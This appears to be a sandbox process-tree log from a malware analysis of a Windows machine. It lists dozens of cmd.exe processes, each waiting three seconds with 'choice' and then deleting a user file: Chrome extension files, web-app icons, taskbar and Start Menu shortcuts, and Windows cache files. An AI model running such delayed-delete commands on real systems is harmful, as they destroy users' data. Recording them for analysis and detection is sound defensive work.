C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C7D95PAM\update100[1].xml"2⤵PID:6364
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14484
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png"2⤵PID:6396
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14772
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png"2⤵PID:6424
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14692
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png"2⤵PID:6452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14268
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png"2⤵PID:6472
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14836
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png"2⤵PID:6492
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14112
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png"2⤵PID:6504
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14080
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png"2⤵PID:6520
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15252
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png"2⤵PID:6540
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14348
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\0Y5LKK0J\RW1dYo2[1].png"2⤵PID:6564
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14360
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\DFTDRE8U\RW1dRhL[1].png"2⤵PID:6592
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14544
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\DFTDRE8U\RW1kENf[1].png"2⤵PID:6620
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13020
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\P6VQJFSE\RW1dYo3[1].png"2⤵PID:6640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10496
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\P6VQJFSE\RW1kPif[1].png"2⤵PID:6656
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13600
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\YRTUULXC\RW1dOLr[1].png"2⤵PID:6692
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:7156
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\YRTUULXC\RW1kPie[1].png"2⤵PID:6708
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14444
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e0d48a6-3356-466e-85d4-f6ae4fabb721}\0.0.filtertrie.intermediate.txt"2⤵PID:6732
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e0d48a6-3356-466e-85d4-f6ae4fabb721}\0.1.filtertrie.intermediate.txt"2⤵PID:6744
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14368
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e0d48a6-3356-466e-85d4-f6ae4fabb721}\0.2.filtertrie.intermediate.txt"2⤵PID:6756
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f61b004d-91b2-4e80-8f3b-a89a97b42e55}\0.0.filtertrie.intermediate.txt"2⤵PID:6772
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15484
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f61b004d-91b2-4e80-8f3b-a89a97b42e55}\0.1.filtertrie.intermediate.txt"2⤵PID:6788
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15276
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f61b004d-91b2-4e80-8f3b-a89a97b42e55}\0.2.filtertrie.intermediate.txt"2⤵PID:6800
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14168
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\appsconversions.txt"2⤵PID:6832
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15548
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\appsglobals.txt"2⤵PID:6860
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14528
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\appssynonyms.txt"2⤵PID:6872
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14428
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\settingsconversions.txt"2⤵PID:6912
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15308
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\settingsglobals.txt"2⤵PID:6924
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14392
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\settingssynonyms.txt"2⤵PID:6944
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13088
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{867ceb26-5a90-4428-a90f-866426f99c9d}\0.0.filtertrie.intermediate.txt"2⤵PID:6972
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15316
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{867ceb26-5a90-4428-a90f-866426f99c9d}\0.1.filtertrie.intermediate.txt"2⤵PID:6992
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15532
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{867ceb26-5a90-4428-a90f-866426f99c9d}\0.2.filtertrie.intermediate.txt"2⤵PID:7012
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk"2⤵PID:7028
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14536
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk"2⤵PID:7052
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10520
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"2⤵PID:7072
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14992
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"2⤵PID:7092
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15104
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk"2⤵PID:7112
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12752
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk"2⤵PID:7132
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13260
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk"2⤵PID:7160
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14412
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk"2⤵PID:4956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk"2⤵PID:5416
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14976
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk"2⤵PID:5468
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10384
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk"2⤵PID:5548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15024
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk"2⤵PID:1892
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\128.png"2⤵PID:5772
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12952
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\offscreendocument.html"2⤵PID:5900
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15332
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4BIWV20J\www.bing[1].xml"2⤵PID:7172
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15416
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html"2⤵PID:7192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14284
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png"2⤵PID:7208
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14924
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png"2⤵PID:7228
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14844
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png"2⤵PID:7244
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15016
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png"2⤵PID:7268
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:5820
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png"2⤵PID:7284
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15516
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png"2⤵PID:7304
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13576
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png"2⤵PID:7316
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:11852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png"2⤵PID:7344
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13344
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png"2⤵PID:7372
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14960
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png"2⤵PID:7388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14640
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png"2⤵PID:7404
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10596
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png"2⤵PID:7428
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14028
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png"2⤵PID:7448
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15508
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png"2⤵PID:7460
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15348
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png"2⤵PID:7488
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14700
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png"2⤵PID:7512
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14672
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png"2⤵PID:7532
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13860
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png"2⤵PID:7556
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13720
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png"2⤵PID:7568
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14160
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png"2⤵PID:7584
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14616
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png"2⤵PID:7600
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14208
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png"2⤵PID:7628
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14436
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png"2⤵PID:7644
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14944
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png"2⤵PID:7664
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13712
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png"2⤵PID:7680
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14584
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png"2⤵PID:7700
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10544
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png"2⤵PID:7720
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15460
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png"2⤵PID:7744
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png"2⤵PID:7772
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14984
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png"2⤵PID:7792
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15356
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png"2⤵PID:7812
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13608
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png"2⤵PID:7828
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15500
-
-
-
